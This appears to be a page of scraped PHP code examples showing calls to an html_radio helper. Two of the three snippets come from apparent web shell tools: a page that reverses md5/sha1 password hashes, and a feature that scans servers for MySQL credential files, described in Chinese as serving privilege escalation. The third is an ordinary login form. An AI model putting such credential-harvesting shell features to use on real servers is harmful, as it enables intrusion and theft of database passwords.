Beispiel #1
0
/**
 * Passwords "hacking" page
 *
 * @return string
 */
function action_pwd_hck()
{
    $output = '<h1>password lookup</h1>';
    if (!function_exists('fsockopen')) {
        $output .= '<p class="error">Seems like fsockopen function is disabled - without it we cant use this.</p>';
    }
    $output .= '<p>Enter md5/sha1 password hash and we try to "reverse" it to plaintext (You can generate password hashes on ' . html_encode_link('eval() page', self, array('eval' => 1)) . ' or ...)</p>';
    $result = '';
    if (!empty($_POST)) {
        $p = $_POST;
        if (!hack) {
            $output .= '<p class="error">sorry, "hackers mode" is disabled</p>';
        } else {
            $answer = getpassbyhash($_POST['hash'], $_POST['type']);
            $result = md5($answer) == $p['hash'] ? 'Password is: <strong>' . $answer . '</strong></p>' : '<p class="error">Password not found :/</p>';
        }
    } else {
        $p['hash'] = md5('pass');
        $p['type'] = 'md5';
    }
    $output .= '<form action="' . self . '" method="post">';
    $output .= html_hidden(array('pwd_hck' => 1));
    $output .= '<p><input type="text" name="hash" size="42" value="' . $p['hash'] . '"></p>';
    $output .= $result;
    $output .= html_radio('type', array('md5' => 'md5', 'sha1' => 'sha1'), $p['type']);
    $output .= ' <input type="submit" value="here we go">';
    $output .= '</form>';
    return $output;
}
Beispiel #2
0
             $bool = true;
         } else {
             $bool = false;
         }
         do_passreturn($_POST['path'], $_POST['newcode'], "tihuan", $bool, $_POST['oldcode']);
     }
     break;
 case "scanfile":
     css_js("4");
     html_n('<tr><td>此功能可很方便的搜索到保存MYSQL用户密码的配置文件,用于提权.<br>当服务器文件太多时,会影响执行速度,不建议使用目录遍历.<form method="POST" name="sform"><br>');
     html_input("text", "path", root_dir, "路径名", "45");
     html_input("checkbox", "pass", "", "使用目录遍历", "", true);
     html_input("text", "code", $_POST['code'], "<br><br>关键字", "40");
     html_select(array("--MYSQL配置文件--", "Discuz", "PHPWind", "phpcms", "dedecms", "PHPBB", "wordpress", "sa-blog", "o-blog"), 0, "onchange='return Fulll(options[selectedIndex].value)'");
     html_n('<br><br>');
     html_radio("搜索文件名", "搜索包含文字", "scanfile", "scancode");
     html_input("submit", "passreturn", "搜索");
     html_n('</td></tr></form>');
     if (!empty($_POST['path'])) {
         html_n('<tr><td>找到文件:<br><br>');
         if (isset($_POST['pass'])) {
             $bool = true;
         } else {
             $bool = false;
         }
         do_passreturn($_POST['path'], $_POST['code'], $_POST['return'], $bool);
     }
     break;
 case "scanphp":
     html_n('<tr><td>原理是根据特征码定义的,请查看代码判断后再进行删除.<form method="POST"><br>');
     html_input("text", "path", root_dir, "查找范围", "40");
Beispiel #3
0
			</div>
			<div class="form-group">
				<label class="sr-only" for="user_pwd">密码:</label>

				<div class="input-group">
					<div class="input-group-addon"><label class="glyphicon glyphicon-lock" for="user_name"></label></div>
					<input class="form-control" placeholder="密码" type="password" id="user_pwd" name="user_pwd"/>
				</div>
			</div>
			<div class="form-group">
				<label class="sr-only">类型</label>

				<div class="input-group">
					<div class="input-group-addon">类型</div>
					<div class="form-control">
						<?php 
echo html_radio(['student' => "学生", "teacher" => "教师", "admin" => "管理员"], "login_type", req()->post('login_type'), "student", "<label>", "&nbsp;&nbsp;</label>\n");
?>
					</div>
				</div>
			</div>

			<div class="form-group text-right">
				<button class="btn btn-default" type="submit">登陆</button>
			</div>
		</fieldset>
	</form>
</div>
</body>
</html>